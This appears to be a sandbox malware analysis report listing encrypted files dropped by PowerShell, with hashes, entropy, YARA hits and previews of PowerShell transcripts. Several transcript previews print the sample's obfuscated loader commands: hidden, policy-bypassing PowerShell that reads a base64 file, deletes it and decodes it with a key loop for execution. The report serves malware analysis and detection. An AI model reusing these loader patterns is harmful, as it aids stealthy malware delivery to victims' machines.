..H..\|.Qr.C`..DUul?.+^.J..7"....xu..2...;.(;...D...W..)..GD.tD.i.T.+.:h+(#.".0..~.L7...,}.O..0.js....$,.].E...........oO..+.dZF}w..D'...Q8]\|..1t..t...TmLO3..w.F.([.w..I..6.[,..&..x.df...yg.M..X%..B+Q.n.{.#M...`t.4......:w...u...).G.'P.H[.4..&..R`.\.nd.,.4.\|~..s......\E3;.G...8.R,S..B.#[..l.t@W....m_$.[3...9h.+._..?....H.."..T!&b...../.nA.m.Q....{.K......+....F.0......7n9)4;&.....8.S...zw..L......./E..lQj.{..&.......E.c)....\|."v.......0.<

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\yIFZoDicJAxjglRT.gvepLyUAWrbGi Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS executable (COM)
Category:	dropped
Size (bytes):	133646
Entropy (8bit):	7.998698500193957
Encrypted:	true
SSDEEP:	3072:P+SVk2i0sAs1rTGHu7Ou5QwyyXuGth3Rk8qmqxHZCKJyI1VnXR:P+R0RAOu9XuGtBRzBmvnh
MD5:	4C3541524BED112CB243CDC6FCEB5E50
SHA1:	91FAB3E02F4ADC5BF49B72F09CA9DB7282F920A4
SHA-256:	B0A86C98E86FFCE7723953F856C5024FFE6CDE17EF9E4E2C61D2002A12EB422C
SHA-512:	8A3145A784F25EBCC2E04EFFA7C7391FB71DFB3CE4AE691A04A4BAA1135417E593DD025B38622922D28E045926E2A1EF241BDA2DEECEFF81A99ED376183A7104
Malicious:	true
Reputation:	unknown
Preview:	.?p..9.w...i.....y`84..(..'O.......kH}...9Pz........<A..f.q.......=.h....&b.+..-}:0.L..O...8.j.4e.A.... .l..i..D-i\|9....B~.......i.X.{..p.m!.......Q......R.[....P...$xM..}.$.r...)p...qP.(.qi[.".5.$.O\.;..Wj..>.z.D..k.$.v.PY..U..(..g..z.y`...O.;D....B.'...xq..a..z._....."..........8..8i\|.-.......^.E.<.g..?....`>/.x..^.......[.Y-\|..cG...I\@.../V.o.........7.g3.........P.FqL.q.>.`........k.[.y.A.w."J.>.L.[/.....,..m.;.......z..g....Kw..h7...x..f....<.a./Y.a..^......CX...>.@....p....Gc..-$}Jle#..z.).8.{..^..[u......J.....hV.....h.g?.X..)..2.7s.~.].b.........C.....\.i.$....%.U..".+.>:.?<.a..X.....y._.....hq....!...d.&..!....O?....+)i'...3.16...v.R...o.%1.~!...._...;K.E.....i..}.o>.)L*3.8rX....x.C..:.SK...6g..z..7..5..7...R.a.E..2....N.N...p....U.Y...R...^J. B"5]H.)...5A.....M......L2..%.BD..y:,.........g..P...H6F.....e.."g.xgkK.b.@..%.b.FTusB......P....D.....a.PRTdw._A..By.r=.oX7..a....!w...n.GD..9.gu..Dd=..%+........ym.gq......

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\yKVnfarwMO.oaeIAXKznvhZUlP Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	112226
Entropy (8bit):	7.998614473987214
Encrypted:	true
SSDEEP:	3072:y6tjacEDfKr0r17YkEAffKxsDR9lNVId6:y6PEDfn1ELAfyOt/Ic
MD5:	25908D0047E1C012B03611E313440BED
SHA1:	CF4CD8AA2CAD3D376A73C235B4D39D65626E59DD
SHA-256:	B555D9D84546923EBD9C54BF9D8989638DE42D2983085099C386637E6B0DD8FB
SHA-512:	5D09EA78E65E42C79156CB52CB80B0D430F8803E55CF2314808A71AF0E57280B314A9570E44CA771D43C07311BFAAA12D58BFAB7F1E7C5FC7287EA9603EAC4A3
Malicious:	true
Reputation:	unknown
Preview:	\}.Bh.".i.cEv.:.......1.;?J<3...f/.v.Q5..L.I.R...<.t...fZ-..5.io.l....[o..<..q.q6Dr(a..:..X.\r.c=....1..u.+.....gZ.u@.9..P....B\.M....iD.[...._........H...x...D...,..U.1...nM.....)..P..#...h...go.1. .o...8J_....<.F..2.e.I....1.'.g./......;lr..X..f)....V...V....p.W..[#P,)G....D+...L..t...#..?"....Y.C..HW]...+..N5#....e.,.9..A.....-......{...a.E......-...@.....Y....!.mrJ!.>M..1y....Z..@Nh_Q....x..Xu.b.....a}.[...W.l......6.5NJ.......>N......Z.2..^d.m]t..H..2"...V.4}..3...>......ntnCA$dy.&.at..k..>..0...d..>.... K..w.....42..E....O..C.d..^...^T..X..&.#_j..V..Tgb.Dk.PO$.._8.F.aE.0). z<..r.......i.l...(.2....Zw.*.A../m[..mb..T..X..S.5.z..p..d.V{L.....B.-....30.......O%..)\|.X..}.1W..PZ.?=.iu?..c@A....P.9W.fb.....8e1.}..r.O.D.,..s..`..i..#..J.GG..~&.......9K...=1b.....'......KL.'A((.L.n.....%...G.3".H..X....C\|..f..9H~.@RG.........A.q)&.no.K......b.5=.....^w...$..."........1.c....^<~.....#Q...rR.N....u....E....v.:.0...4z..w."...$....^}..H.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\yNBfjEqmKZXtVkOlwIz.GSaQEmuiYWNZjRlnspJ Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	89946
Entropy (8bit):	7.998242961787162
Encrypted:	true
SSDEEP:	1536:1Q+kyOmMu3BT8iRfxooQLy+TF7fpvgaHv8oGm2bcbtTWE5bys:2+kNmF3KilgLLRNv/U5AtCObys
MD5:	D020FAFDDA75D792296A76F44F1A3D5A
SHA1:	6CD058F6D711750AA2087DFDE853A2DB4C7F1896
SHA-256:	5997FDE3809B3471B4653C78B01FF8E44A13F5566B51564733759DD6EE3C80A7
SHA-512:	8E7ADFE57829FE5B04E54F24CD9A929C0F47C6ACAD4C0528F55A30BF81386ED93879B9DB6730841437E0B563BF129A4C31F89AEC9AF917A4FD7C2CB94C894669
Malicious:	true
Reputation:	unknown
Preview:	..~.IN~....i9..........~..!..o.&...<Z:.....lh..M.Z.L.b...k..%B.....;....J.V&.j,..:z.l.OE..G.)]!...gy...R.....eC.6).A)H...9.^...F......q.v..n0.a...4..nPW.?^......Hw@D4X"H...#......Zy ....q.:..xvai..t..k...U.^..M..U(.wr.?.0...8...16...d.U...+;5....A...L.+w....l.......a..>lU.......,U..4...\|....Kb7.U.+.}...#...:.A@r.5.......v.....kW.........H...p.w.2.yA..;.S.f......XB.]=..W..4.9....f.D....%E..)..=M.......4W..,o...2.V~..+7.<.w..q....b.T.m3.9.`......8...{.EW..z?.C......H.....s.Y.....e.V.m......R....@....-.s.....!....yu..1..>.. ......N.n.).......Y._..<P]z.0.(.R.EK.HD7.!.P....n.nL..C...U...>N.G...Ek.s!.>.N..q_D.9....(D...c...NE..H)A......2..t..&J.........[..i.o..@R.z....T...'.(...(.R*......].z.$..X.t.@...3..n..x........{..:...,......0.+w..Z$.....L.&=@.9..>..3.A...?....+.uV..p.)...ML.^MM...r........Tz....m.6...-...,..Y.'...]....U..r.7d..n$M;h...aY]'4LFS.\.f...O...m@.g......wO.q..Y..!.y...4D.F....}.b..sa\zo....a...D.!1.0.{k.....r+g...c..].?...7

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\yzvlHOZsjpGrQSFVnie.lwceDMzFGgp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	75753
Entropy (8bit):	7.997616727169609
Encrypted:	true
SSDEEP:	1536:pUAS8IcH1rbYnpHNOB8ldYk/Pvf/utoy9l1wZATSUVg:pUASurbCptOOlFfOtP9I+SUu
MD5:	E9B2298EC5374C48047BF7DBAD2DAD85
SHA1:	C02E21EA947F7163D768A6D5C8DB5DAF638E847C
SHA-256:	24EFE8176A985F221E6BAC0DB1CE6154683F82571E46D36C0895D088813DDEB5
SHA-512:	96AE04EB15E31AC1EFF2804397A0DCF092F7249C5039339A91A15C1E0EC86E04B03A239DB6B816FDCB8AD35DD3BF4AAA1D602C4F19369374CEDE717D1B25E24F
Malicious:	true
Reputation:	unknown
Preview:	....u:...B..z4CW75.?/.....B.......h.........)."y(..\|a.D......Cdb..&..o".R4t.a.Ip_w..$o+^../.".........M.....~....9.BY.?-.b..i.4w...%..`\|...MF.c....G.?0.d.A...j.6...t...~..'..h..i%..I.G..r.V......a.oX..or..[........Ww$.0C3S.RS....\|H$..N...G(T4.z6.5..'KK[T;..Z"L.9EM...e......w\...".^1...0.5.%.Z..,\|.l.4l-.Se<..j.O)...P.N4B.q..../.+e....uvRb.....]...ABR...).7.b.q.5...y..A.b.w6.\S..#I..F.L.+....%'6r..Ez..Z...Qj....D_..L,{....Q...Q....%..p...X.F.%..Z.......m.?`........:......v..oGU@......tX0:Y8..1.>.`..T4.0....DLA"..P.#...W;..A.1..t.....}u.I...'.{j.G....x..b..X.`.c.......&."..X..O.-.. 7eo.....O...hd.8-...V&....:?....~...-...YB..M.C.e....?]...QT*......;<.m7...%t..O..h;.P.`:.6.I....H.%..ej.F.\7....X...3H.e.J.k.2."8..)....6....];=G]..+T.-..m.....:..G..d....>{a......y....i.g.......uo.!.;V.._.....>......nx...}Gz..7..7....B.....Y.p.....a\|......z7..Hu..a.."..d..S...p..7<6]...hx.A...W./...........:%.=....pb).".Eo1r7_^..w..u.n..........S.U\|{..z$.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\zEdtUMvTylPsZrW.TVKGRBrpstHAmbfPWO Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	152396
Entropy (8bit):	7.998901346897268
Encrypted:	true
SSDEEP:	3072:TobzJ+ZeHdf/VtVFsHWJk8F/AlV9Js0R3JKf2KVeVCK:UbzJvHdvVFsx8Fc9JZ3gf2KV+
MD5:	B4C6B5724BF7B0F9CF35C77A4197439B
SHA1:	7E84D127A8D4CE54471C94CC3D3DE5BFBFA74E6E
SHA-256:	598EF33BC00581CB1C342BE7762A8296CC637C3BE9A4D1FC274D6D4D586657EF
SHA-512:	6AC31F059518D618843ECD11B80819ACDF11A987D7D81908AA917D49B5E32A1E3813F663A0F6B99EA1BAD2753363818B88B16A6FDD8C2678123B7EAF78504ECF
Malicious:	true
Reputation:	unknown
Preview:	b6..".B...4".i.c.o.'..A..........-8....Lb..SD.....P?..9\.3.6.!...jd.+-....3L$~.%y...6Ex7...f\vA)o...E.....7j.x....vW.-.O.458..#......T......@..:<.^.e?2..~rm.....3Jy.......A9H.m..i.-JQ.D.(..=".B.j[.........6.....9....T.q.j...@/..B...X..m.Q..Z]dsO.b.P..{:-.%.......r.`6.:.#B..>............Q..K4.i......[..>.f.QB.b.XK.L.U.L..c{.....xg..3.\>..6P......4G....x...4&..d.Hk.$x..JK...W..w...\.........:c..Qf..,JX.\|..........m.n.j..V@g...uvC...jL.#..'I~.4.E-t.....w...Z.@5W..#..q.~Q.~..2.lx..J..\.J...........#z......?e.4..7.a.'.x..../.!?.m....T. &UV.g.t.x....0.zX........`.....M.>8......(..?.6.$ehV....`..k...]..).#.8....{..2..\.<rx...1[...@....<B..J...[28...x..6.5.e.F&=;.?......(....-."..R)~4P\...lA...l.W.4r.pf.W..flf..U......q..j...$........qx.<..%B.X....h......B.Z..j.P..95..4.TE.!77N.a.........^..........W.k..q....GSjx..L.........8../.;.....HB..S_WR....?...0.=).o....`...h*...J..E..&t.$.H.H...PZ3s.?....R....\......m..i.... .a.L..]_R..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\zNnZLXDVvW.NDKBSlQRPuCWkhr Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	144948
Entropy (8bit):	7.998756287082279
Encrypted:	true
SSDEEP:	3072:fEajZ6dbIt4V7ThzCYuq5IgtoRcaB0VAxPjKkU6OP:fXZU8lXgUc/QrHC
MD5:	0317FF587E0A71D1E0D344978263E7EB
SHA1:	95B5D2ED502141382C16139ED4B15377122C9822
SHA-256:	9BF6EB85EBA6DB0839695281DD4A78133206C94CEE19E115996394552491F706
SHA-512:	4464E5934FED9ED81C0805C2E2A62EAAD57CCF6984A014FA0C3C4DA1CC0133DDC2E427EFC14371D2E3850AA13541F5A585BE4048F8D0A93943074278ACCB1917
Malicious:	true
Reputation:	unknown
Preview:	m.SwM+.......Jj..J.\...F.9#...$......b.~\.!._.f\..f.....0..j9%.w..B..3bd.0..@Aw.#{....'.....E7..i{.......>..1.ky...m..b....~lI.......)H}...Aw!..I{m/.....d.2zc.6..UZ.....,...!....4..hl...U..U"d...M....b`.....72...Y>IEt)..-._....g.....:.....q'\|.\x..X....5v.}q.f.)..g8<.}9B...7av)hJ....5Y...qD.cG..$;z[.i..}?..Gx.....1.fG...Xnq....,.\|.y...Y.3j.x..,..qE.3.Xk.Sk...3AKK++A.^..f\....D..a.W..../6.M..7.,P...6...o[.i.......p.2.qJ..O%G.l$DSW..-_....].D.e88..lZ.W....."...\68.e.......8...K.....A;..R..u...R,.. .s......E..D`..dt.m...3..\!4.t..x..d,....w..oC.>X..5 .,O?..(..q....F7.;..\|....F.. .]_.\|.$k.....;.w^..K..>...$W..P:&4G9.!."...uvY.C.7..\|c ...iFH.QR..../$....RY.:(ac..s.{....m.....uU...y.U........4..Y:B@....9..[..{..I.6.!&7.Mq.....?.l.2..i...[h..0....4..8...D8..Vx..x.....+^....M@...p..3q'.C1/..... ...U..I;......L.^<D.Xp}e..o..b\..".2.iN~'..L9..;..;.t.U.Z8Y.E.\0.pr.+.4...]m}0+..3..&.......i8........F.>..*.w..zf..]i..B....~b;.#kA..c......o&')..k=..].aB!..].

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\zlsFRCoiMYPGIJhV.RASlniKYZa Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	103271
Entropy (8bit):	7.998186310650172
Encrypted:	true
SSDEEP:	3072:o5G/fHjSHj4SW8ogmRj8mRR5S57b3WCpC9VMrwxQvzc:oE/fHd+o5R4mRR5cd0LxIQ
MD5:	F5C7A04045226BBA524214901A347F86
SHA1:	0E7CD4055181BDC6B09BF1A5EFB00A4A67CECFB4
SHA-256:	1798F36AC56EB15EBFA446E81D8224CFD07CDB110B313E74652EEB09CC94E009
SHA-512:	45B1DB4BF7E416A8FDF6CE27582679C43E5A3657904B0D9BCCF66983015EE49AE105757ED290F98A8C26F9514FC759E3C30586DC160518B73C98C6C4B120D1E7
Malicious:	true
Reputation:	unknown
Preview:	e.q...x....)d4o[.R.Z.W..x..Q..gm!(..2.:.......l)>X.++.-...{.wN.Gi.<w.)....\.7!.3..(.<A.......2>;.lo.0../7.rf.o...HQd&..'.A...X.e!.....m..).)3T..v....`G..........y...E..,/.X>..J....8jj...gd'o.y.{;.1]..~..;....Fu.Anf.1....ru....R..H.#..{s<..]...;.y.....U...y.9T.(.........j...R.m.\|}..Q.%..i._...n.lV..}..p../..r.+7.x~}{q.. .'.xm<.p.7.....N..b..x.rl....p..\.eI...b..Z....,..ob..N.v....N...3.Z........Y"8P...y.[...KE.k?..oH...V........S..W.....y...".....J.@..^.o.$X.`2..L..r.#..`......x_\.Cd%W.g%.!.Y."..1g.&.d.$.0a.[....ux..a.t....s...Q....5P......f4.+Y.+.....5(...#.unN.nK.$....n.Z+....B.'.(.."6.P].....^.....*..}Q.n93.'7E..b#....t...V.1.....}O....i\..[wC.....l..._..Y...aG..........=W..Z.i.... 1..Z.../2.S....`fg..+.......Z?..._...&o.C'..}R..k%F-.pJ..u....-.0.%..?..c.)...Q.f..c\|.i(r.K..BR...L..u.+,...G...#{......?...... ..........7..w..zq.].J....i...7-.@..#zr..u.<....5.)lwg.3".?]$.p..16.a.MZ..C.K.......m2..Lo0;.."..>\|..fM4.x$..}........][.x...z ..f...

C:\Users\user\Documents\20210828\PowerShell_transcript.179605.+ee_YVKB.20210828000458.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	18114
Entropy (8bit):	5.604939659456911
Encrypted:	false
SSDEEP:	384:h8LU3p08LU3po8LU3po84Y3dY3Xk3K8LU3p1858JJT8JJT8v48LU3pzwFFo8LU3L:6WDW3WZWXYSWzwFF3WVtGE
MD5:	E35E2C87E0650B6B67A85A033851E847
SHA1:	E690BCA9AE4157C8A122881EA19D4FF8716C5531
SHA-256:	199476B693A0B74B82A733498A2058CFEE47A566EF80E65220758DF7D5CD8360
SHA-512:	678C302C2FE4F023808E341B15F70B0DD803F278784B3BA4EC55CCAEB1B5E15449FFD098116914792F04E3FAD8B3A6B400E4B3B87247400976002675E8F03D36
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\Documents\20210828\PowerShell_transcript.179605.+ee_YVKB.20210828000458.txt, Author: Joe Security
Reputation:	unknown
Preview:	.**********************..Windows PowerShell transcript start..Start time: 20210828000516..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3

C:\Users\user\Documents\20210828\PowerShell_transcript.179605.BdkR8zp8.20210828000600.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2108
Entropy (8bit):	5.344220842045211
Encrypted:	false
SSDEEP:	48:BZRvheoO0uqDYB1ZhZRvheoO0uqDYB1Z3ufZ62pfxKZ62pfxT:BZdheNPqDo1ZhZdheNPqDo1Z3uB6u06o
MD5:	E4FF918C689988367CA421B28A256139
SHA1:	F68DEBD30D89EFC033BDD2D1175ECD216D623F0D
SHA-256:	C91405F62B32CFE65A6BFB3E7532A48F25D2203353272EBB21692D8F23A974A4
SHA-512:	5129A702E9D655F3D14DF0EEEE5B339CDFDA81DBA953F97126FD73A307368E1FDA73E786A92B992189D794F56E773312FD10D083F930E36B5AF666945BC5352D
Malicious:	false
Reputation:	unknown
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210828000602..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell..Process ID: 5508..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..********************..Windows PowerShell transcript start..Start time: 20210828000602..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell..Process ID: 5508..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSMa

C:\Users\user\Documents\20210828\PowerShell_transcript.179605.OHVMY+dj.20210828000500.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	8362
Entropy (8bit):	5.620510715077381
Encrypted:	false
SSDEEP:	192:U8TnU3xfakTZ8TnU3xfakT68TnU3xfakTM858JJT8JJT8vdtEJT1W1hJW1y:U8LU3pZ8LU3p68LU3pM858JJT8JJT8vH
MD5:	7316CD6AEEACB290FE88DD49C5032B5E
SHA1:	0F2697C218DA77DA9C8D62380FDF5BED6B511A4B
SHA-256:	175B9C590B8FA7DFA7038F07B839DC4CBA4827905A7E6434FAA693A0BFCF19B0
SHA-512:	6AE97F5D2BA431F5897AA5F11314807B5A686C5624A2E8938DEBDDD1912B6F764FD4B1643DBB8CE6DFF690482A5C71C7F3BE51DCB59FFD0BD5CBE0A27A5980A5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\Documents\20210828\PowerShell_transcript.179605.OHVMY+dj.20210828000500.txt, Author: Joe Security
Reputation:	unknown
Preview:	.**********************..Windows PowerShell transcript start..Start time: 20210828000504..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3

C:\Users\user\Documents\20210828\PowerShell_transcript.179605.P8ooBoix.20210828000552.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1796
Entropy (8bit):	5.838770259681285
Encrypted:	false
SSDEEP:	24:BxSA4xvBnuzx2DOXi0pM8GaxoSH6W0vhs9t9b19+Gzl9pmn9Gb2iXWUHjeTKKjXR:BZMvheoOX1Gar6rQMiGUqDYB1ZA
MD5:	026FF6E87B30840598BA1A0D78B5240D
SHA1:	671352403045678BB63EB02BBDFA4BED29EEF69D
SHA-256:	34E319C8D6491810E892646DD0E8BE724A132AC042D1BF8FE479DBEE71484F10
SHA-512:	BF2C876979767E5C421EF182D25565A9CEA4DC87A2E2D150DC1B3A2B12D7C4C5A75DDF6818AD4FEF663A771220E6FB7910C8D0CD2DB5427BB8B0466859C54B93
Malicious:	false
Reputation:	unknown
Preview:	.**********************..Windows PowerShell transcript start..Start time: 20210828000553..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: PowerShell.exe -WiNDOwstylE HIddeN -Ep BYPAsS -cOMMaNd $ac4e9891fa848c834b332582d5737='PEdaTnlwcVotaXFyUV55cWxTVTxzK3FqO299cyR4cFFyTVdvMGptWmtGKWN6diNheTd2JW0xYXg0UUFQdCl9eVp4U1I4Pm94U3NwcjtQRUN5b205I3lTTVBJeHxRO1Zza3JqMGZ9UWZRc2V0Z0l1IUd7OHp4MFd6cXd8ZnJrcEB8flpJQFNlNChAcmpefkByYXFCQHU8MHZAYGthNkBUN15vQHZWKWleMWgjJkBUIXhyQFVEVEdAYGF3Z0BSb358QGBKZ09Ae0VDfl4xaXV8QF8/cF9eT0NIeEB1PDY/';$aa72f1a1fc04ca9b1e4f38c4d6a44=[sYsteM.io.FiLE]::ReAdaLlBYTes('C:\Users\user\AppData\Roaming\MicRoSoFt\AzaONdljHpEnf\ISqTifyHJbs.KnRFhVuafP');fOR($a6eb59278704fda8e348cbb9154ed=0;$a6eb59278704fda8e348cbb9154ed -Lt $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt;){FOr($afdf6f52050420a0ab96054f3fd1c=0;$afdf6f52050420a0ab96054f3fd1c -lT $ac4e9891fa848c834b332582d5737.Lengt

C:\Users\user\Documents\20210828\PowerShell_transcript.179605.RDwWASt6.20210828000501.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	18114
Entropy (8bit):	5.604879705243435
Encrypted:	false
SSDEEP:	384:98LU3pp8LU3pL8LU3pO84Y3dY3Xk3M8LU3pK858JJT8JJT8v48LU3pawFFs8LU3w:2WCW8WFWwY6WawFF7WatG8
MD5:	12DE0E95401DB1FFC786A19C77CBF4B2
SHA1:	4D41514B04B0A977CED15333DF5D662C7DCC0EBD
SHA-256:	B5CB35A3632C2FE50507970D03F98C6864534887000D7E8207A49647422EFA3C
SHA-512:	44C7AF187A211B69A7E90FBD0AF5DC4C0FE3903A150EB26769231698A1912E5775082FD274281E031EAE20D6BDA4C669AB1A7445283871D736D5FC607E343173
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\Documents\20210828\PowerShell_transcript.179605.RDwWASt6.20210828000501.txt, Author: Joe Security
Reputation:	unknown
Preview:	.**********************..Windows PowerShell transcript start..Start time: 20210828000527..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3

C:\Users\user\Documents\20210828\PowerShell_transcript.179605.atyuF1G2.20210828000500.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	8406
Entropy (8bit):	5.62007990252587
Encrypted:	false
SSDEEP:	192:F8TnU3xfakT48TnU3xfakT98TnU3xfakTC858JJT8JJT8vdtEWW1PW1S:F8LU3p48LU3p98LU3pC858JJT8JJT8vq
MD5:	E9BDA5665AACA878C4CC966CEB2855DD
SHA1:	5F959CE407039F55D1B04B8B19162284DAF732A9
SHA-256:	7F2F358FCB5F3294FF1C68633318FAC6DAA5B62C62941A3D10E2481E2C9C8381
SHA-512:	CBD368F72648A111E543FBB1BA8327F0255D4F9E002D599BF7B5891FB12135540C834533B3364DA1DC2689FACC0EEDB9F7F911E5C3647408412E5EFEF6375BA9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\Documents\20210828\PowerShell_transcript.179605.atyuF1G2.20210828000500.txt, Author: Joe Security
Reputation:	unknown
Preview:	.**********************..Windows PowerShell transcript start..Start time: 20210828000505..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3

C:\Users\user\Documents\20210828\PowerShell_transcript.179605.eC4YmVaf.20210828000557.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
